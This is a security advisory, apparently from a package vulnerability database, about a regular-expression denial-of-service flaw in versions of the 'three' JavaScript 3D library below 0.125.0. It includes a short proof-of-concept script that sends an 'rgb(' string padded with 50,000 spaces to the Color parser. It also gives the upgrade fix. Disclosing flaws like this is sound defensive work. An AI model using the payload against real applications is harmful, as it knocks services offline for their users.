Vulnerability	Vulnerable Version
H Regular Expression Denial of Service (ReDoS) three is a JavaScript 3D library Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can happen when handling `rgb` or `hsl` colors. PoC: `var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `three` to version 0.125.0 or higher.	<0.125.0

Regular Expression Denial of Service (ReDoS)

three is a JavaScript 3D library

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can happen when handling rgb or hsl colors.

PoC:

var three = require('three')

function build_blank (n) {
 var ret = "rgb("
 for (var i = 0; i < n; i++) {
  ret += " "
 }

 return ret + "";
}

var Color = three.Color

var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade three to version 0.125.0 or higher.

<0.125.0

Go back to all versions of this package